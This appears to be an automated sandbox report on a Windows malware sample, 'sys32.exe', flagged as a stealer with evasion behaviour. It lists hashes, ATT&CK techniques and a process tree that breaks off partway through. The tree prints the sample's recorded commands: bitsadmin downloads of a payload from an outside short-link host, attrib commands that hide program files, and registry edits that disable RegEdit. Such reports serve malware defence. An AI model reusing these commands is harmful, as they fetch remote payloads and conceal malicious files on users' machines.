2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af

Analysis

max time kernel
16s
max time network
129s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
26-08-2023 16:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sys32.exe
Size

32KB
MD5

1830f906145a43cfb22a718b520b8661
SHA1

52e2de8b1fd17a6f4cba06e7a1b20c550acf27a7
SHA256

2290f94e11f761d70b2e8f1998224d40af3f16770caf2443267bd648de3580af
SHA512

4f8e5ffa41b80436bffdfe8068d7a4249ed54e70c899257a03bad7a77a830f36c8fe681640661aa11a6f3be1feed770179b97b1f963be28eac2ca80ac282d632
SSDEEP

384:8LipZl447piqb/lUYf5uH3w59AMRG5qUIjFgOrjFymqAeO8W8xbEz5E1OuO:dmiiqTfk2AMRGwlFgOrjsbb71ZO

Score

8^/10

evasion spyware stealer

Malware Config

Signatures

Disables RegEdit via registry modification 3 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	sys32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	sys32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	sys32.exe

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3036	attrib.exe
3024	attrib.exe
2176	attrib.exe
2180	attrib.exe
2100	attrib.exe
968	attrib.exe
2000	attrib.exe
1660	attrib.exe
2268	attrib.exe
2588	attrib.exe
2268	attrib.exe
1588	attrib.exe
1340	attrib.exe
2188	attrib.exe
2192	attrib.exe
2700	attrib.exe
796	attrib.exe
2348	attrib.exe
656	attrib.exe
1476	attrib.exe
2008	attrib.exe
2820	attrib.exe
2812	attrib.exe
2468	attrib.exe
1056	attrib.exe
1708	attrib.exe
2288	attrib.exe
1200	attrib.exe
1080	attrib.exe
1996	attrib.exe
2264	attrib.exe
1448	attrib.exe
2008	attrib.exe
1572	attrib.exe
2688	attrib.exe
2552	attrib.exe
2188	attrib.exe
1532	attrib.exe
2992	attrib.exe
1568	attrib.exe
1276	attrib.exe
368	attrib.exe
2932	attrib.exe
1980	attrib.exe
988	attrib.exe
1916	attrib.exe
2308	attrib.exe
2780	attrib.exe
2364	attrib.exe
3000	attrib.exe
2628	attrib.exe
2920	attrib.exe
388	attrib.exe
2252	attrib.exe
808	attrib.exe
1964	attrib.exe
2996	attrib.exe
1320	attrib.exe
2792	attrib.exe
2916	attrib.exe
1060	attrib.exe
2480	attrib.exe
1560	attrib.exe
2588	attrib.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.zrz	conhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe	sys32.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.zrz	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe	sys32.exe
File created	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\policytool.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.zrz	attrib.exe
File created	C:\Program Files\Internet Explorer\iediagcmd.exe	sys32.exe
File created	C:\Program Files\Internet Explorer\iexplore.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\idlj.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.zrz	conhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.zrz	conhost.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE	sys32.exe
File created	C:\Program Files\Internet Explorer\iediagcmd.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javah.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstatd.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.zrz	attrib.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javaws.zrz	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.zrz	attrib.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\keytool.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.zrz	attrib.exe
File created	C:\Program Files\Internet Explorer\ielowutil.exe	sys32.exe
File created	C:\Program Files\7-Zip\Uninstall.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jps.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.zrz	attrib.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe	sys32.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.zrz	attrib.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jdb.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\serialver.zrz	attrib.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	sys32.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe	sys32.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.zrz	attrib.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe	sys32.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe	sys32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 10 IoCs

dropper

BITS Jobs

T1197

pid	Process
2256	bitsadmin.exe
2196	bitsadmin.exe
2572	bitsadmin.exe
2848	bitsadmin.exe
972	bitsadmin.exe
1536	bitsadmin.exe
1964	bitsadmin.exe
2736	bitsadmin.exe
2496	bitsadmin.exe
2892	bitsadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
736	notepad.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2408	sys32.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2408	sys32.exe
2788	sys32.exe
2804	sys32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2408 wrote to memory of 2572	2408	sys32.exe	28
PID 2408 wrote to memory of 2572	2408	sys32.exe	28
PID 2408 wrote to memory of 2572	2408	sys32.exe	28
PID 2408 wrote to memory of 2572	2408	sys32.exe	28
PID 2408 wrote to memory of 2788	2408	sys32.exe	30
PID 2408 wrote to memory of 2788	2408	sys32.exe	30
PID 2408 wrote to memory of 2788	2408	sys32.exe	30
PID 2408 wrote to memory of 2788	2408	sys32.exe	30
PID 2408 wrote to memory of 1356	2408	sys32.exe	31
PID 2408 wrote to memory of 1356	2408	sys32.exe	31
PID 2408 wrote to memory of 1356	2408	sys32.exe	31
PID 2408 wrote to memory of 1356	2408	sys32.exe	31
PID 2408 wrote to memory of 2836	2408	sys32.exe	32
PID 2408 wrote to memory of 2836	2408	sys32.exe	32
PID 2408 wrote to memory of 2836	2408	sys32.exe	32
PID 2408 wrote to memory of 2836	2408	sys32.exe	32
PID 2408 wrote to memory of 2468	2408	sys32.exe	35
PID 2408 wrote to memory of 2468	2408	sys32.exe	35
PID 2408 wrote to memory of 2468	2408	sys32.exe	35
PID 2408 wrote to memory of 2468	2408	sys32.exe	35
PID 2788 wrote to memory of 2848	2788	sys32.exe	36
PID 2788 wrote to memory of 2848	2788	sys32.exe	36
PID 2788 wrote to memory of 2848	2788	sys32.exe	36
PID 2788 wrote to memory of 2848	2788	sys32.exe	36
PID 2408 wrote to memory of 2824	2408	sys32.exe	38
PID 2408 wrote to memory of 2824	2408	sys32.exe	38
PID 2408 wrote to memory of 2824	2408	sys32.exe	38
PID 2408 wrote to memory of 2824	2408	sys32.exe	38
PID 2408 wrote to memory of 1240	2408	sys32.exe	43
PID 2408 wrote to memory of 1240	2408	sys32.exe	43
PID 2408 wrote to memory of 1240	2408	sys32.exe	43
PID 2408 wrote to memory of 1240	2408	sys32.exe	43
PID 2408 wrote to memory of 1340	2408	sys32.exe	41
PID 2408 wrote to memory of 1340	2408	sys32.exe	41
PID 2408 wrote to memory of 1340	2408	sys32.exe	41
PID 2408 wrote to memory of 1340	2408	sys32.exe	41
PID 2408 wrote to memory of 2692	2408	sys32.exe	45
PID 2408 wrote to memory of 2692	2408	sys32.exe	45
PID 2408 wrote to memory of 2692	2408	sys32.exe	45
PID 2408 wrote to memory of 2692	2408	sys32.exe	45
PID 2408 wrote to memory of 2760	2408	sys32.exe	47
PID 2408 wrote to memory of 2760	2408	sys32.exe	47
PID 2408 wrote to memory of 2760	2408	sys32.exe	47
PID 2408 wrote to memory of 2760	2408	sys32.exe	47
PID 2408 wrote to memory of 2056	2408	sys32.exe	49
PID 2408 wrote to memory of 2056	2408	sys32.exe	49
PID 2408 wrote to memory of 2056	2408	sys32.exe	49
PID 2408 wrote to memory of 2056	2408	sys32.exe	49
PID 2408 wrote to memory of 680	2408	sys32.exe	51
PID 2408 wrote to memory of 680	2408	sys32.exe	51
PID 2408 wrote to memory of 680	2408	sys32.exe	51
PID 2408 wrote to memory of 680	2408	sys32.exe	51
PID 2408 wrote to memory of 1172	2408	sys32.exe	53
PID 2408 wrote to memory of 1172	2408	sys32.exe	53
PID 2408 wrote to memory of 1172	2408	sys32.exe	53
PID 2408 wrote to memory of 1172	2408	sys32.exe	53
PID 2408 wrote to memory of 1436	2408	sys32.exe	55
PID 2408 wrote to memory of 1436	2408	sys32.exe	55
PID 2408 wrote to memory of 1436	2408	sys32.exe	55
PID 2408 wrote to memory of 1436	2408	sys32.exe	55
PID 2408 wrote to memory of 1636	2408	sys32.exe	57
PID 2408 wrote to memory of 1636	2408	sys32.exe	57
PID 2408 wrote to memory of 1636	2408	sys32.exe	57
PID 2408 wrote to memory of 1636	2408	sys32.exe	57

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1708	attrib.exe
1880	attrib.exe
2756	attrib.exe
2932	attrib.exe
972	attrib.exe
432	attrib.exe
828	attrib.exe
2820	attrib.exe
1508	attrib.exe
1680	attrib.exe
2672	attrib.exe
1360	attrib.exe
936	attrib.exe
1528	attrib.exe
2980	attrib.exe
2572	attrib.exe
2768	attrib.exe
760	attrib.exe
1636	attrib.exe
1892	attrib.exe
2452	attrib.exe
1240	attrib.exe
2232	attrib.exe
2584	attrib.exe
1576	attrib.exe
2536	attrib.exe
672	attrib.exe
2388	attrib.exe
3052	attrib.exe
2916	attrib.exe
1864	attrib.exe
2024	attrib.exe
388	attrib.exe
1716	attrib.exe
1276	attrib.exe
2484	attrib.exe
2392	attrib.exe
1080	attrib.exe
2272	attrib.exe
2780	attrib.exe
2416	attrib.exe
1104	attrib.exe
1448	attrib.exe
2620	attrib.exe
2672	attrib.exe
2760	attrib.exe
2536	attrib.exe
1612	attrib.exe
2672	attrib.exe
2468	attrib.exe
2480	attrib.exe
3056	attrib.exe
3028	attrib.exe
2672	attrib.exe
1124	attrib.exe
1732	attrib.exe
1576	attrib.exe
2392	attrib.exe
2752	attrib.exe
1776	attrib.exe
2832	attrib.exe
472	attrib.exe
2784	attrib.exe
3012	attrib.exe

C:\Users\Admin\AppData\Local\Temp\sys32.exe
"C:\Users\Admin\AppData\Local\Temp\sys32.exe"
1⤵
- Disables RegEdit via registry modification
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2408
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
  2⤵
  - Download via BitsAdmin
  PID:2572
- C:\Users\Admin\AppData\Local\Temp\sys32.exe
  "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
  2⤵
  - Disables RegEdit via registry modification
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
    3⤵
    - Download via BitsAdmin
    PID:2848
- - C:\Users\Admin\AppData\Local\Temp\sys32.exe
    "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
    3⤵
    - Disables RegEdit via registry modification
    - Suspicious use of SetWindowsHookEx
    PID:2804
  - - C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
      4⤵
      Download via BitsAdmin
      PID:972
  - - C:\Users\Admin\AppData\Local\Temp\sys32.exe
      "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
      4⤵
      PID:1420
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        5⤵
        Download via BitsAdmin
        
        PID:2892
    - - C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        5⤵
        
        PID:2708
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        6⤵
        Download via BitsAdmin
        
        PID:1536
      - C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        6⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        7⤵
        Download via BitsAdmin
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        7⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        8⤵
        Download via BitsAdmin
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        8⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        9⤵
        Download via BitsAdmin
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        9⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        10⤵
        Download via BitsAdmin
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\sys32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sys32.exe" 0
        10⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://goo.su/WINSp C:\Users\Admin\AppData\Local\Temp\Server.exe
        11⤵
        Download via BitsAdmin
        
        PID:2496
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        10⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        10⤵
        
        PID:472
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        10⤵
        
        PID:2844
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        10⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        10⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        10⤵
        
        PID:2864
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        10⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        10⤵
        Views/modifies file attributes
        
        PID:2760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        10⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        10⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        10⤵
        
        PID:560
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        10⤵
        Sets file to hidden
        
        PID:1980
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        10⤵
        Views/modifies file attributes
        
        PID:1864
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        10⤵
        Views/modifies file attributes
        
        PID:2536
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        10⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        10⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        10⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        10⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        10⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        10⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        10⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        10⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        10⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        9⤵
        Sets file to hidden
        
        PID:2268
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        9⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        9⤵
        
        PID:880
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        9⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        9⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        9⤵
        Views/modifies file attributes
        
        PID:1240
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        9⤵
        
        PID:832
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        9⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        9⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        9⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        9⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        9⤵
        
        PID:2480
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        9⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        9⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        9⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        9⤵
        Sets file to hidden
        
        PID:1588
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        9⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        9⤵
        
        PID:368
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        9⤵
        Sets file to hidden
        
        PID:2552
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        9⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        9⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        9⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        9⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
        9⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
        9⤵
        
        PID:796
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
        9⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
        9⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
        9⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
        9⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\attrib.exe
        
